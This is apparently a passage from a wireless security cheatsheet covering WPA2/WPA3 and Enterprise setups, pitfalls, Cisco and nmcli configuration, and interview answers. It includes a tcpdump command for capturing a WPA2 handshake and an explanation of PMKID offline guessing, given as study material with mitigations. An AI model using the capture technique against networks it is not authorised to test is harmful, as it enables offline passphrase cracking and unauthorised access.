  • Home Network: WPA2-PSK or, where every device supports it, WPA3-SAE with a long random passphrase (the passphrase is the only secret, and one captured WPA2 handshake or PMKID allows unlimited offline guessing). A WPA3 transition mode SSID accepts both WPA2 and WPA3 clients but lets an attacker push capable clients down to WPA2, so prefer a WPA3-only SSID plus a separate legacy SSID if some devices cannot be upgraded.
  • Enterprise Network: WPA2-Enterprise or WPA3-Enterprise with 802.1X/EAP against a RADIUS server. Each user or device has its own credential (ideally a certificate with EAP-TLS), access can be revoked individually, and the RADIUS server can assign a VLAN per user or device.
  • Public Wi-Fi: Treat it as hostile and use a VPN for anything sensitive. Wi-Fi Enhanced Open (OWE, published alongside WPA3) encrypts open networks without a passphrase but does not authenticate the hotspot, so it stops passive sniffing only.
  • IoT Devices: Check that devices support WPA2-CCMP or WPA3; many only do WPA2-PSK. Put them on their own SSID and VLAN with firewall rules toward the rest of the network, so a compromised device (or a leaked IoT passphrase) does not expose the main network.

Example: Capturing a WPA2 Handshake with tcpdump:

tcpdump -i wlan0 -I -s 0 -w wpa2_handshake.pcap 'wlan host <AP MAC address> and (type mgt subtype assoc-req or type mgt subtype assoc-resp or ether proto 0x888e)'

The interface must be in monitor mode (-I asks tcpdump to enable it; otherwise set it up with iw or airmon-ng first and tune to the AP's channel), because a managed interface never shows 802.11 management frames or the raw EAPOL exchange. The filter is pcap-filter syntax, not Wireshark display-filter syntax: it keeps association requests and responses and EAPOL frames (EtherType 0x888E) involving the AP's MAC address. All four handshake messages appear only if a client (re)associates while you capture; an AP that includes a PMKID in message 1 gives that value away even with no client present. Open the .pcap in Wireshark with the display filter "eapol" and check the Key Information flags to confirm that messages 1 to 4 are present and share one replay counter sequence.

Common Pitfalls:

  • Weak Passwords: In WPA/WPA2-PSK an attacker who captures one handshake (or a PMKID from message 1) can test guesses offline at GPU speed, so short or dictionary passphrases fall quickly. Use a long random passphrase. WPA3-SAE removes the offline attack, but a guessable password is still guessable online, one attempt per exchange.
  • Outdated Firmware: Keeping firmware updated on access points and wireless clients is critical for patching security vulnerabilities; KRACK, for example, was fixed by client and AP patches, not by configuration.
  • TKIP/WEP: Using TKIP or WEP is highly discouraged due to known vulnerabilities. Use AES/CCMP (WPA2, WPA3-Personal) or AES/GCMP-256 (WPA3-Enterprise 192-bit). Disable WPA/WPA2 mixed mode as well: with TKIP as the group cipher, the whole BSS inherits its weaknesses.
  • Incompatible Devices: Older devices may not support WPA2, WPA3 or 802.11w. Upgrade them, or isolate them on a separate SSID and VLAN; do not lower the security of the main SSID to accommodate them.
  • RADIUS Server Issues: An unreachable server, a wrong shared secret (the server silently discards requests whose Message-Authenticator does not verify, so the client just times out), an expired server certificate, or clock skew that breaks TLS all prevent users from authenticating. Check the RADIUS server logs and confirm the access point is defined as a client there.
  • Client Configuration Errors: Wrong passphrase, wrong EAP method or inner method, or, dangerous in the other direction, a client configured not to validate the RADIUS server certificate, which lets a rogue access point harvest PEAP/TTLS credentials.
  • Hidden SSID: Hiding the SSID does NOT enhance security: it still appears in probe and association frames, and clients configured for a hidden network broadcast its name wherever they go. It is security through obscurity and can cause compatibility issues.
  • PMKID attacks: An access point that includes a PMKID in handshake message 1 lets an attacker compute PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC) for passphrase guesses without any client being present. MFP does not help, because message 1 is a data frame, not a management frame. Mitigations: a long random passphrase, disabling PMKID caching where the AP allows it, or moving to WPA3-SAE, whose PMK is not derived from the passphrase.

Troubleshooting Tips:

  • Check Logs: Examine access point and RADIUS server logs for error messages.
  • Packet Capture: Use Wireshark or tcpdump to capture and analyze wireless traffic.
  • Test Client: Try connecting with a different client device.
  • Verify Credentials: Double-check the username and password.
  • Firmware Update: Ensure that all devices have the latest firmware.
  • Restart Devices: Try restarting the access point and client device.

Configure WPA2-PSK on a Cisco Access Point (autonomous IOS CLI):

configure terminal
dot11 ssid <SSID>
 authentication open
 authentication key-management wpa version 2
 wpa-psk ascii <passphrase>
 exit
interface Dot11Radio0
 encryption mode ciphers aes-ccm
 ssid <SSID>
 end

The SSID and its key management are defined under dot11 ssid; the radio interface selects the cipher (aes-ccm, never tkip) and binds the SSID. "authentication open" is the 802.11 open system authentication that precedes the handshake, not an open network.

Configure WPA3-SAE on a Cisco Catalyst 9800 WLC (IOS-XE CLI):

configure terminal
wlan <profile-name> <wlan-id> <SSID>
 no security wpa akm dot1x
 no security wpa wpa2
 security wpa wpa3
 security wpa akm sae
 security wpa psk set-key ascii 0 <passphrase>
 security pmf mandatory
 no shutdown
 end

A new WLAN defaults to WPA2 with 802.1X, so those are removed first. PMF must be mandatory: WPA3 requires protected management frames.

Configure WPA2-Enterprise on a Cisco Access Point (autonomous IOS CLI):

configure terminal
aaa new-model
aaa authentication login eap_methods group radius
radius-server host <RADIUS server IP address> auth-port 1812 acct-port 1813 key <shared secret>
dot11 ssid <SSID>
 authentication open eap eap_methods
 authentication key-management wpa version 2
 exit
interface Dot11Radio0
 encryption mode ciphers aes-ccm
 ssid <SSID>
 end

The shared secret must match the client entry for this access point on the RADIUS server; a mismatch shows up as requests the server silently drops rather than as an explicit reject.

Linux (NetworkManager) Example:

Using nmcli to connect to a WPA2-PSK network:

nmcli dev wifi connect <SSID> password <password>

Interview Questions:

  • What are the differences between WEP, WPA, WPA2, and WPA3?
    • WEP uses RC4 with a static key and a 24-bit IV and is broken in minutes. WPA was the interim fix: TKIP, still RC4 but with per-packet keys and the Michael MIC, plus the 802.1X/PSK key hierarchy. WPA2 (802.11i) mandates AES-CCMP. WPA3 keeps CCMP-128 for Personal but replaces the PSK-based handshake with SAE, makes 802.11w management frame protection mandatory, and adds a 192-bit Enterprise mode (GCMP-256, SHA-384, ECDSA P-384).
  • Explain the 4-Way Handshake in WPA2.
    • The access point sends an ANonce (message 1). The client picks an SNonce, derives PTK = PRF(PMK, both MACs, both nonces) and returns the SNonce with a MIC under the KCK (message 2). The access point derives the same PTK, verifies the MIC, and sends the GTK encrypted with the KEK plus its own MIC (message 3); the client verifies and acknowledges (message 4), and both install the TK. The PMK is never transmitted; the MICs prove each side holds it, and the replay counter and fresh nonces prevent replay.
  • What is the purpose of the PMK and PTK?
    • The PMK (Pairwise Master Key) is the long-lived 256-bit secret of a session: the PSK in Personal mode, the first 256 bits of the EAP Master Session Key in Enterprise mode, or the SAE output in WPA3-Personal. The PTK (Pairwise Transient Key) is derived from the PMK for each association and split into KCK, KEK and TK. It is unique to each client and session, so compromising one client's TK does not expose other clients or later sessions.
  • What is SAE and how does it improve security in WPA3?
    • SAE (Simultaneous Authentication of Equals, the Dragonfly handshake) is a password-authenticated key exchange. Both sides derive a password element from the passphrase, exchange Commit values built from it with random masks, derive a shared PMK, and prove it with Confirm. A captured exchange gives an attacker no way to test passphrase guesses offline (one guess per active attempt), and because every PMK comes from fresh randomness it also provides forward secrecy. Dictionary resistance and forward secrecy are separate properties; SAE delivers both, WPA2-PSK neither.
  • What is the difference between WPA-PSK and WPA-Enterprise?
    • WPA-PSK (Personal) uses one passphrase shared by every client, so anyone with it can derive every client's PMK and it must be rotated when someone leaves. WPA-Enterprise uses 802.1X/EAP and a RADIUS server: each user or device has its own credential, gets its own PMK, and can be revoked individually.
  • What is forward secrecy?
    • Session keys cannot be recovered from the long-term secret alone. In WPA2-PSK they can: the PTK follows from the PSK plus the nonces and MACs, all sent in the clear, so a later passphrase leak decrypts earlier captures. In SAE the PMK comes from the random values chosen during the exchange, so the passphrase alone does not recover past sessions.
  • What are some common attacks against WPA2, and how can they be mitigated?
    • Offline dictionary attacks on a captured 4-Way Handshake or PMKID (mitigate with a long random passphrase or WPA3-SAE); deauthentication floods, used to force handshakes or as denial of service (mitigate with MFP/802.11w); KRACK key reinstallation (mitigate by patching clients and access points); rogue access points and evil twins against Enterprise clients (mitigate with server certificate validation and EAP-TLS).
  • What is Management Frame Protection (MFP)?
    • MFP (802.11w) adds integrity protection to deauthentication, disassociation and robust action frames (and encryption for unicast ones), so a third party cannot forge them to knock clients off the network. It is optional in WPA2 and mandatory in WPA3.
  • What are the benefits of using WPA3 over WPA2?
    • SAE (no offline dictionary attacks, forward secrecy), mandatory management frame protection, a 192-bit Enterprise mode for high-security networks, and, published alongside it, Enhanced Open (OWE) for public networks and Easy Connect (DPP) for onboarding devices without a screen.
  • How would you troubleshoot a client that cannot connect to a WPA2-Enterprise network?
    • Check the client's configuration (identity, password, EAP method and inner method, trusted CA for the server certificate). Verify the RADIUS server is reachable from the access point and that the shared secret matches. Read the access point and RADIUS server logs to see which EAP step fails (identity, TLS handshake, inner authentication, or no request arriving at all, which points to the secret or the network path). Capture the EAPOL exchange to confirm whether EAP-Failure arrives or the client times out.

Related Concepts:

  • 802.11 Standards: The IEEE 802.11 family defines the wireless MAC and PHY; 802.11i added the RSN key hierarchy behind WPA2, 802.11w the protected management frames, and 802.11s the SAE exchange later adopted by WPA3.
  • EAP Methods: EAP-TLS (mutual certificates), PEAP and EAP-TTLS (server certificate with a tunnelled inner method), EAP-FAST (Cisco, PAC based).
  • RADIUS Protocol: Remote Authentication Dial-In User Service, UDP 1812/1813; carries EAP between the access point and the authentication server. RadSec (RADIUS over TLS) is the hardened transport.
  • VPN (Virtual Private Network): Provides an encrypted tunnel for secure communication over the internet, independent of the Wi-Fi security in use.
  • Network Segmentation (VLANs): Isolating different parts of the network for security purposes, including dynamic VLAN assignment from RADIUS per user or device.
  • Wireless Intrusion Detection System (WIDS): Monitors the air for rogue access points, deauthentication floods and evil twins.
  • Wireless Intrusion Prevention System (WIPS): Actively prevents wireless attacks, for example by containing rogue access points.
  • 802.1X Authentication: Port-based network access control; the same supplicant, authenticator and authentication server model is used for wired switch ports.

This cheatsheet provides a foundation for understanding wireless security and will help you effectively design, troubleshoot, and secure wireless networks. Remember to always stay up-to-date on the latest security threats and best practices.